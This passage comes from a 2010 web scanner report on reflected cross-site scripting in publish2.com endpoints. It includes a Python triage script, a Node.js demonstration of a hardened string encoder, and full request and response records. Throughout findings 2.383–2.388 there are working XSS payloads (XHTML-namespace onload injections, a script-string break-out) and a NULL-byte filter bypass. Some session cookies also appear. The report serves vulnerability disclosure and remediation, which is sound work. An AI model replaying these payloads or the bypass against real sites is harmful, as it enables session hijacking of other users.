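HTML_TYPES = ("", "text/html", "application/xhtml+xml")  # rendered as HTML on navigation

def parse_response(raw: str) -> Tuple[int, Dict[str, str], str]:
    """Split a raw HTTP/1.x response into (status, lower-cased headers, body)."""
    head, _, body = raw.partition("\n\n")
    lines = head.split("\n")
    headers = {k.strip().lower(): v.strip()
               for k, _, v in (line.partition(":") for line in lines[1:])}
    return int(lines[0].split()[1]), headers, body

def split_jsonp(body: str) -> Tuple[str, str]:
    """Return (callback_prefix, json_text); the prefix is '' for bare JSON."""
    start, trimmed = body.find("{"), body.rstrip()
    if start > 0 and body[start - 1] == "(" and trimmed.endswith(")"):
        return body[:start - 1], body[start:trimmed.rfind(")")]
    return "", body

def json_strings(node):
    """Yield every string value in a decoded JSON document."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, (dict, list)):
        for value in (node.values() if isinstance(node, dict) else node):
            yield from json_strings(value)

def inside_cdata(body: str, payload: str) -> bool:
    """True if the payload occurs and every occurrence is inside <![CDATA[ ]]>."""
    found = False
    for m in re.finditer(re.escape(payload), body):
        found, before = True, body[:m.start()]
        if before.rfind("<![CDATA[") <= before.rfind("]]>"):
            return False  # no CDATA section is open here: markup would be parsed
    return found

def xhtml_element_present(body: str) -> bool:
    """True if the XML parser built an element in the XHTML namespace, which is
    what the namespace trick described in the report relies on."""
    try:
        root = ET.fromstring(body.encode("utf-8"))
    except ET.ParseError:
        return False
    return any(el.tag.startswith("{" + XHTML_NS + "}") for el in root.iter())

def triage(payload: str, raw_response: str) -> Dict[str, object]:
    """Classify where the payload landed and what that means for execution."""
    _, headers, body = parse_response(raw_response)
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    callback, json_text = split_jsonp(body)
    try:
        in_json = any(payload in s for s in json_strings(json.loads(json_text)))
    except ValueError:
        in_json = False
    t = {"reflected_verbatim": payload in body, "content_type": ctype,
         "renders_as_html": ctype in HTML_TYPES,
         "in_jsonp_callback": payload in callback, "in_json_string": in_json,
         "in_cdata": inside_cdata(body, payload),
         "xhtml_element": "xml" in ctype and xhtml_element_present(body)}
    order = (("renders_as_html", "script-runs-on-direct-load"),
             ("xhtml_element", "script-runs-on-direct-load"),
             ("in_jsonp_callback", "unrestricted-jsonp-callback"),
             ("in_cdata", "unescaped-in-cdata"),
             ("in_json_string", "unescaped-in-json-string"))
    t["verdict"] = (next((v for k, v in order if t[k]), "unescaped-unknown-context")
                    if t["reflected_verbatim"] else "not-reflected")
    return t

# Constructed inputs, abbreviated from the report's responses for 2.373, 2.377 and 2.382.
CALLBACK_PAYLOAD = "f2898<script>alert(1)</script>852eec1b1c"
CALLBACK_RESPONSE = ("HTTP/1.1 200 OK\nContent-Type: application/json; charset=utf-8\n\n"
    'jsonp1292504943065f2898<script>alert(1)</script>852eec1b1c({"title":"Publish2 Links - '
    'callback: jsonp1292504943065f2898<script>alert(1)<\\/script>852eec1b1c"})')
TAG_PAYLOAD = "c4543<img src=a onerror=alert(1)>7b29acd748d"
TAG_RESPONSE = ("HTTP/1.1 200 OK\nContent-Type: application/json; charset=utf-8\n\n"
    'jsonp1292504943065({"title":"Publish2 Links - tag: wwgdc4543<img src=a onerror=alert(1)>'
    '7b29acd748d, number_of_items: 5","feedlink":"http:\\/\\/www.publish2.com\\/"})')
RSS_PAYLOAD = ("5df20<a xmlns:a='http://www.w3.org/1999/xhtml'>"
               "<a:body onload='alert(1)'/></a>6be915f83ed")
RSS_RESPONSE = ("HTTP/1.1 200 OK\nContent-Type: application/rss+xml; charset=utf-8\n\n"
    '<?xml version="1.0" encoding="utf-8"?>\n<rss version="2.0">\n<channel>\n'
    "<title><![CDATA[Publish2 Links - tag: wwgd" + RSS_PAYLOAD + "]]></title>\n"
    "</channel>\n</rss>\n")

if __name__ == "__main__":
    for name, p, r in (("2.373 callback", CALLBACK_PAYLOAD, CALLBACK_RESPONSE),
                       ("2.377 tag", TAG_PAYLOAD, TAG_RESPONSE),
                       ("2.382 rss tag", RSS_PAYLOAD, RSS_RESPONSE)):
        print(name, "->", triage(p, r)["verdict"])
```

Run directly it prints one verdict per constructed response: the callback finding is an unrestricted JSONP callback, the tag finding is an unescaped value inside a JSON string, and the RSS finding is an unescaped value inside CDATA, where the injected elements never reach the parser as elements. Given a text/html response such as the one at the top of this section, triage reports script-runs-on-direct-load; given the same markup in an XML response outside CDATA, xhtml_element_present returns True and the verdict is the same, which is the case the scanner's namespace note describes.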

2.383. http://www.publish2.com/search/links.xml [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /search/links.xml

Issue detail

The value of the callback request parameter is copied into the XML document, inside the CDATA section of the title element under the publish2 root, without escaping. The payload dc41e<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>b72313bca52 was submitted in the callback parameter. This input was echoed as dc41e<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>b72313bca52 in the application's response.

The response is XML, which a browser does not by default process as HTML. The scanner's proof of concept injects elements that declare the XHTML namespace, which tricks some browsers (including Firefox) into processing part of a standalone XML response as HTML; it is designed to execute when the browser loads the response directly, not when the XML is consumed by a script within another page.

In this response, however, the reflection lands inside a <![CDATA[ ... ]]> section, so an XML parser treats the injected <a> and <a:body> as character data rather than elements: the proof of concept as submitted creates no namespace, and the onload handler does not run on direct load. Treat the finding as an unescaped reflection, which still has to be fixed by XML-escaping the value (or by not wrapping untrusted text in CDATA), rather than as confirmed script execution.

Request

GET /search/links.xml?newsgroup=jeff+jarvis+links&tag=wwgd&number_of_items=5&callback=jsonp1292504943065dc41e<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>b72313bca52 HTTP/1.1
Host: www.publish2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:16:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:41 GMT; path=/
Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:41 GMT; path=/
Set-Cookie: kohanasession=bld6kggnuehds8jp1abcvk4cm6; path=/
Set-Cookie: kohanasession=bld6kggnuehds8jp1abcvk4cm6; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJibGQ2a2dnbnVlaGRzOGpwMWFiY3ZrNGNtNiI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTQwMjs%3D; path=/
Content-Length: 973
Connection: close
Content-Type: application/xml; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<publish2>
<title><![CDATA[Publish2 Links - newsgroup: jeff jarvis links, tag: wwgd, number_of_items: 5, callback: jsonp1292504943065dc41e<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>b72313bca52]]>
...[SNIP]...

2.384. http://www.publish2.com/search/links.xml [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.publish2.com
Path:   /search/links.xml

Issue detail

The name of an arbitrarily supplied request parameter is copied into the XML document as plain text, in this case inside the CDATA section of the <feedLink> element. The payload %00a8d28<a>1e70a658436 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a8d28<a>1e70a658436 in the application's response.

This behaviour demonstrates that it is possible to inject new tags into the returned XML document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place; as with the other issues on this endpoint, the echo point sits inside a CDATA section, so the injected tag is character data to an XML parser unless the section can be terminated first.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /search/links.xml?newsgroup=jeff+jarvis+links&tag=wwgd&number_of_items=5&callback=jsonp1292504943065&%00a8d28<a>1e70a658436=1 HTTP/1.1
Host: www.publish2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:16:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:42 GMT; path=/
Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:42 GMT; path=/
Set-Cookie: kohanasession=rirpvqacs5e0897p05tqtcc4r7; path=/
Set-Cookie: kohanasession=rirpvqacs5e0897p05tqtcc4r7; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJyaXJwdnFhY3M1ZTA4OTdwMDV0cXRjYzRyNyI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTQwMzs%3D; path=/
Content-Length: 717
Connection: close
Content-Type: application/xml; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<publish2>
<title><![CDATA[Publish2 Links - newsgroup: jeff jarvis links, tag: wwgd, number_of_items: 5, callback: jsonp1292504943065]]></title>
<feedLink><![CDATA[http://www.publish2.com/search/links.xml?newsgroup=jeff+jarvis+links&tag=wwgd&number_of_items=5&callback=jsonp1292504943065&%00a8d28<a>1e70a658436=1]]>
...[SNIP]...

2.385. http://www.publish2.com/search/links.xml [newsgroup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /search/links.xml

Issue detail

The value of the newsgroup request parameter is copied into the XML document as plain text between tags. The payload cc3b8<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>ab7e270bceb was submitted in the newsgroup parameter. This input was echoed as cc3b8<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>ab7e270bceb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which declare the XHTML namespace it is possible to trick some browsers (including Firefox) into rendering part of the response as HTML. Note that this proof-of-concept attack is designed to execute when the response is opened directly in the browser, not when the XML is consumed by a script within another page. The echo point here is inside a CDATA section within the <title> element, so the injected elements are character data to an XML parser unless the input can first terminate the section with ]]>; this request does not attempt that.

Request

GET /search/links.xml?newsgroup=jeff+jarvis+linkscc3b8<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>ab7e270bceb&tag=wwgd&number_of_items=5&callback=jsonp1292504943065 HTTP/1.1
Host: www.publish2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:16:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:40 GMT; path=/
Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:40 GMT; path=/
Set-Cookie: kohanasession=2fvqp0tkgaae0jiq5nutoecle4; path=/
Set-Cookie: kohanasession=2fvqp0tkgaae0jiq5nutoecle4; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiIyZnZxcDB0a2dhYWUwamlxNW51dG9lY2xlNCI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTQwMTs%3D; path=/
Content-Length: 973
Connection: close
Content-Type: application/xml; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<publish2>
<title><![CDATA[Publish2 Links - newsgroup: jeff jarvis linkscc3b8<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>ab7e270bceb, tag: wwgd, number_of_items: 5, callback: jsonp1292504943065]]>
...[SNIP]...

2.386. http://www.publish2.com/search/links.xml [number_of_items parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /search/links.xml

Issue detail

The value of the number_of_items request parameter is copied into the XML document as plain text between tags. The payload 6cab1<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>f51a646d8a7 was submitted in the number_of_items parameter. This input was echoed as 6cab1<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>f51a646d8a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which declare the XHTML namespace it is possible to trick some browsers (including Firefox) into rendering part of the response as HTML. Note that this proof-of-concept attack is designed to execute when the response is opened directly in the browser, not when the XML is consumed by a script within another page. The echo point here is inside a CDATA section within the <title> element, so the injected elements are character data to an XML parser unless the input can first terminate the section with ]]>; this request does not attempt that.

Request

GET /search/links.xml?newsgroup=jeff+jarvis+links&tag=wwgd&number_of_items=56cab1<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>f51a646d8a7&callback=jsonp1292504943065 HTTP/1.1
Host: www.publish2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:16:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:41 GMT; path=/
Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:41 GMT; path=/
Set-Cookie: kohanasession=phe08t59sgsd7o59f09abu8lv1; path=/
Set-Cookie: kohanasession=phe08t59sgsd7o59f09abu8lv1; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJwaGUwOHQ1OXNnc2Q3bzU5ZjA5YWJ1OGx2MSI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTQwMjs%3D; path=/
Content-Length: 973
Connection: close
Content-Type: application/xml; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<publish2>
<title><![CDATA[Publish2 Links - newsgroup: jeff jarvis links, tag: wwgd, number_of_items: 56cab1<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>f51a646d8a7, callback: jsonp1292504943065]]>
...[SNIP]...

2.387. http://www.publish2.com/search/links.xml [tag parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /search/links.xml

Issue detail

The value of the tag request parameter is copied into the XML document as plain text between tags. The payload d4dd7<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>b3bf1b2b36e was submitted in the tag parameter. This input was echoed as d4dd7<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>b3bf1b2b36e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which declare the XHTML namespace it is possible to trick some browsers (including Firefox) into rendering part of the response as HTML. Note that this proof-of-concept attack is designed to execute when the response is opened directly in the browser, not when the XML is consumed by a script within another page. The echo point here is inside a CDATA section within the <title> element, so the injected elements are character data to an XML parser unless the input can first terminate the section with ]]>; this request does not attempt that.

Request

GET /search/links.xml?newsgroup=jeff+jarvis+links&tag=wwgdd4dd7<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>b3bf1b2b36e&number_of_items=5&callback=jsonp1292504943065 HTTP/1.1
Host: www.publish2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:16:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:41 GMT; path=/
Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:41 GMT; path=/
Set-Cookie: kohanasession=9h87e67jvav4qlkacc2qm9q3g6; path=/
Set-Cookie: kohanasession=9h87e67jvav4qlkacc2qm9q3g6; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiI5aDg3ZTY3anZhdjRxbGthY2MycW05cTNnNiI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTQwMjs%3D; path=/
Content-Length: 973
Connection: close
Content-Type: application/xml; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<publish2>
<title><![CDATA[Publish2 Links - newsgroup: jeff jarvis links, tag: wwgdd4dd7<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>b3bf1b2b36e, number_of_items: 5, callback: jsonp1292504943065]]>
...[SNIP]...

2.388. http://www.publish2.com/syndicate/widget/ [comment_font_family parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /syndicate/widget/

Issue detail

The value of the comment_font_family request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 252ab"-alert(1)-"dd91ceb4c9b was submitted in the comment_font_family parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; where the request URL must appear in the script, it should be emitted as a properly encoded JavaScript string literal rather than concatenated between quotation marks. Note that this endpoint serves JavaScript (Content-Type: application/x-javascript) intended to be loaded via a <script src> tag from embedding pages such as the Referer shown; opening the URL directly does not execute it, and injected code runs in the origin of whichever page includes the script with these parameters.
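Added example (JavaScript for Node.js; not the widget's own code and not part of the scanner report): it rebuilds the scripts[i].src == "..." comparison from the response with the request URL concatenated in, executes it with alert() replaced by a hook to confirm that the payload from this issue runs, then builds the same comparison with a string-literal encoder and shows it is inert and still compares against the original URL. The function names and the shortened widget URL are assumptions for illustration.

```javascript
// Added example (not Publish2's widget code). The vulnerable concatenation from the response,
// executed with alert() hooked, beside a hardened string-literal encoder.

const JS_PAYLOAD = '252ab"-alert(1)-"dd91ceb4c9b';   // payload from issue 2.388
// Shortened stand-in for the widget URL that the script compares against (constructed).
const WIDGET_BASE =
  'http://www.publish2.com/syndicate/widget/?feed=journalists/jeff-jarvis/links/wwgd/json&comment_font_family=';

// The shape seen in the response: the request URL dropped verbatim into a double-quoted literal.
function naiveSnippet(url) {
  return 'if (scripts[i].src == "' + url + '") { scr = scripts[i]; }';
}

// Hardened: JSON.stringify yields a valid JavaScript string literal with quotes and backslashes
// escaped; additionally escape < and > (against </script> break-out if the snippet is ever
// inlined) and U+2028/U+2029 (line terminators in older engines) as \uXXXX sequences.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function safeSnippet(url) {
  return 'if (scripts[i].src == ' + jsStringLiteral(url) + ') { scr = scripts[i]; }';
}

// Execute a snippet the way the browser executes the served widget, with alert() replaced by
// a hook that records the call. Returns { alertCalled, syntaxError }.
function runSnippet(snippet) {
  let alertCalled = false;
  try {
    const fn = new Function('alert',
      'var scripts = [{src: ""}], i = 0, scr = null; ' + snippet + ' return scr;');
    fn(() => { alertCalled = true; });
    return { alertCalled, syntaxError: false };
  } catch (e) {
    return { alertCalled, syntaxError: e instanceof SyntaxError };
  }
}

// Runs both variants against the URL carrying the scanner payload.
function jsDemo() {
  const url = WIDGET_BASE + JS_PAYLOAD;
  return {
    naive: runSnippet(naiveSnippet(url)),
    safe: runSnippet(safeSnippet(url)),
    // The encoded literal must still evaluate back to the exact URL, or the src comparison breaks.
    roundTrip: new Function('return ' + jsStringLiteral(url))() === url,
  };
}
```

With the naive snippet the literal closes at the payload's first quote and "-alert(1)-" becomes arithmetic between two strings, so the hook fires; with jsStringLiteral the quotes are escaped, nothing executes, and the literal still evaluates to the original URL. The same encoder applies to every parameter reflected into this script (issues 2.388 to 2.393).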

Request

GET /syndicate/widget/?feed=journalists/jeff-jarvis/links/wwgd/json&feed_type=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=252ab"-alert(1)-"dd91ceb4c9b&comment_font_size= HTTP/1.1
Host: www.publish2.com
Proxy-Connection: keep-alive
Referer: http://www.buzzmachine.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:16:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: kohanasession=6i6fq02ruum5lesfhssseka761; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession=6i6fq02ruum5lesfhssseka761; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiI2aTZmcTAycnV1bTVsZXNmaHNzc2VrYTc2MSI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDU0MTk7; path=/
Content-Length: 3302
